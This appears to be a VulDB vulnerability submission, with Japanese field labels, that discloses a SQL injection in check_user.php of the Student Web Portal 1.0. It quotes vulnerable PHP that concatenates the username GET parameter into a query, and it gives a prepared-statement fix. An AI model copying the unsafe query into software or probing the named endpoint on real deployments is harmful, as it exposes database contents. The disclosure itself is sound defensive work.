| タイトル | code-projects.org STUDENT WEB PORTAL IN PHP WITH SOURCE CODE 1.0 SQL Injection |
|---|
| 説明 | STUDENT WEB PORTAL IN PHP WITH SOURCE CODE SQL-INJECT
Student Web Portal In PHP With Source Code - Source Code & Projects
Summary
Student Web Portal In PHP With Source Code - Source Code & Projects contains a SQL Injection vulnerability in due to unsafe string concatenation of user-controlled input into an SQL query. An unauthenticated remote attacker can supply a crafted parameter to manipulate the database query logic, potentially enabling data disclosure and other impacts depending on database privileges and deployment configuration.check_user.phpusername
Vulnerability Details
Vulnerability Class: SQL Injection
CWE: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command)
Affected Endpoint: /check_user.php?username=...
Affected Parameter: (HTTP GET)username
Affected Component/File: check_user.php
Database/API: MySQL via mysqli
Vulnerable Code (excerpt):
$query = "select * from user where user_name='".$_GET['username']."'";
$table = mysqli_query($connection, $query);
Root Cause User input from is directly concatenated into an SQL statement without parameterization, allowing an attacker to inject SQL syntax and alter query semantics.$_GET['username']
Impact
Depending on the environment and database permissions, exploitation may allow:
Manipulation of the username-existence check logic (inconsistent “already exist” vs “available” results)
Blind SQL Injection (boolean/time-based) to infer database contents even when errors are suppressed
Potential sensitive data disclosure if the database account has broader read access
The exact impact depends on DB privileges, MySQL configuration (e.g., multi-statement settings), application behavior, and any upstream security controls.
Severity / CVSS
Recommended CVSS v3.1 Base Score: 7.5 (High) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Rationale: Remote, low complexity, no authentication, no user interaction; primary risk is confidentiality.
Remediation
Primary Fix: Use prepared statements (parameterized queries) and reduce query scope.
Secure Patch Example (mysqli prepared statement):
<?php
error_reporting(0);
include 'config.php';
if (isset($_GET['username'])) {
$username = $_GET['username'];
$stmt = mysqli_prepare($connection, "SELECT 1 FROM user WHERE user_name = ? LIMIT 1");
if ($stmt) {
mysqli_stmt_bind_param($stmt, "s", $username);
mysqli_stmt_execute($stmt);
mysqli_stmt_store_result($stmt);
if (mysqli_stmt_num_rows($stmt) === 1) {
echo "Username already exist.";
} else {
echo "Username Available";
}
mysqli_stmt_close($stmt);
}
}
?> |
|---|
| ソース | ⚠️ https://github.com/Qing-420/cve/blob/main/sql.md |
|---|
| ユーザー | TrySec (UID 94998) |
|---|
| 送信 | 2026年01月29日 12:27 (3 月 ago) |
|---|
| モデレーション | 2026年02月07日 09:50 (9 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 344860 [code-projects Student Web Portal 1.0 /check_user.php ユーザー名 SQLインジェクション] |
|---|
| ポイント | 20 |
|---|